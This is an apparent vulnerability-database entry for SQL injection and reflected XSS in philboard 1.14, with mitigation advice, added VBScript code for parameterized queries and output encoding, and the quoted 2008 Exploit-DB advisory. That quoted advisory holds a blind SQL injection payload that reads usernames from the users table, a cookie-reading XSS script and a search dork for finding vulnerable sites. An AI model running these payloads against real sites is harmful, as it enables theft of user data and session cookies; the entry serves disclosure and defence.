Vendor: philboard
By: Bl@ckbe@rD ('Tunisian TerrorisT')
CVSS: 9.3 (HIGH)
Title: Remote SQL Injection and Remote XSS Exploit
CWE: 89 (SQL Injection), 79 (Cross-site Scripting)
Product Name: philboard
Affected Version From: 1.14
Affected Version To: 1.14
Patch Exists: YES
Related CWE: N/A
CPE: a:philboard:philboard:1.14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

philboard v 1.14 Multiple Remote Exploits

A remote SQL injection vulnerability exists in philboard v 1.14: the forumid parameter of forum.asp is placed into a database query without validation, so an attacker can inject arbitrary SQL and have it executed by the backend database (the advisory below demonstrates a blind injection that reads the users table one character at a time). philboard v 1.14 is also vulnerable to reflected cross-site scripting: the searchterms parameter of search.asp is echoed back to the page unencoded, so an attacker can inject arbitrary JavaScript that runs in the victim's browser.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
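The mitigation above, worked into code for the two parameters the advisory names (forum.asp?forumid= and search.asp?searchterms=). This is an added example in classic ASP/VBScript, not philboard's own source, which is not on this page: it assumes an open ADODB.Connection in `conn`, and the `forums`/`posts` tables and their columns are hypothetical (the advisory only names a `users` table). It also goes one step beyond the mitigation text by HTML-encoding the reflected search term, which addresses the XSS half of the advisory.

```vbscript
<%
' Added example (not philboard's code). Assumes an open ADODB.Connection in "conn";
' the "forums" and "posts" tables and their columns are hypothetical names.
Option Explicit
Const adCmdText = 1
Const adInteger = 3
Const adVarChar = 200
Const adParamInput = 1

' --- forum.asp: accept only a plain integer for forumid, then bind it as a parameter.
Function GetForumId()
    Dim raw, i
    raw = Trim(Request.QueryString("forumid"))
    ' IsNumeric() also accepts "1e3" and "1.5"; require digits only.
    If Len(raw) = 0 Or Len(raw) > 9 Then
        GetForumId = -1
        Exit Function
    End If
    For i = 1 To Len(raw)
        If InStr("0123456789", Mid(raw, i, 1)) = 0 Then
            GetForumId = -1
            Exit Function
        End If
    Next
    GetForumId = CLng(raw)
End Function

Function LoadForum(conn, forumId)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' A "?" placeholder instead of string concatenation: the value travels as a typed
    ' parameter, so an IIF(...) or a quote in forumid can never alter the statement.
    cmd.CommandText = "SELECT forumid, name FROM forums WHERE forumid = ?"
    cmd.Parameters.Append cmd.CreateParameter("forumid", adInteger, adParamInput, , forumId)
    Set LoadForum = cmd.Execute
End Function

' --- search.asp: the search term is bound the same way and HTML-encoded on output.
Function SearchPosts(conn, term)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' "%" and "_" inside term still act as LIKE wildcards; that widens the match but
    ' cannot change the statement, because the whole pattern is one bound parameter.
    cmd.CommandText = "SELECT subject FROM posts WHERE subject LIKE ?"
    cmd.Parameters.Append cmd.CreateParameter("term", adVarChar, adParamInput, 255, "%" & term & "%")
    Set SearchPosts = cmd.Execute
End Function

Dim forumId, term, rs
forumId = GetForumId()
If forumId < 0 Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid forum id"
    Response.End
End If
Set rs = LoadForum(conn, forumId)

' Cap the length, then encode: Server.HTMLEncode turns <script> into &lt;script&gt;,
' so a reflected term is rendered as text rather than executed.
term = Left(Request.QueryString("searchterms"), 100)
Response.Write "<p>Results for: " & Server.HTMLEncode(term) & "</p>"
Set rs = SearchPosts(conn, term)
%>
```

The digit-only check is deliberate rather than relying on IsNumeric(): the advisory's payload is built entirely from characters a numeric check would reject, but the parameter binding is what actually closes the hole, so the query is safe even if the validation were relaxed later. Every place that writes request data into the page, not only the search results line, needs the same Server.HTMLEncode() treatment.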

Exploit-DB raw data:

> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits

> |+| Team            : InjEct0r5

> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;

> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;

> [+] Dork            : Powered by v1.14 powered by philboard v1.14

> --//-->

> [+] Expl0iT :

> Remote SQL Injection :

> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]

> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00

> Remote XSS Exploit :

> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]

> [XSS] --> <script>alert(document.cookie)</script>

# milw0rm.com [2008-06-27]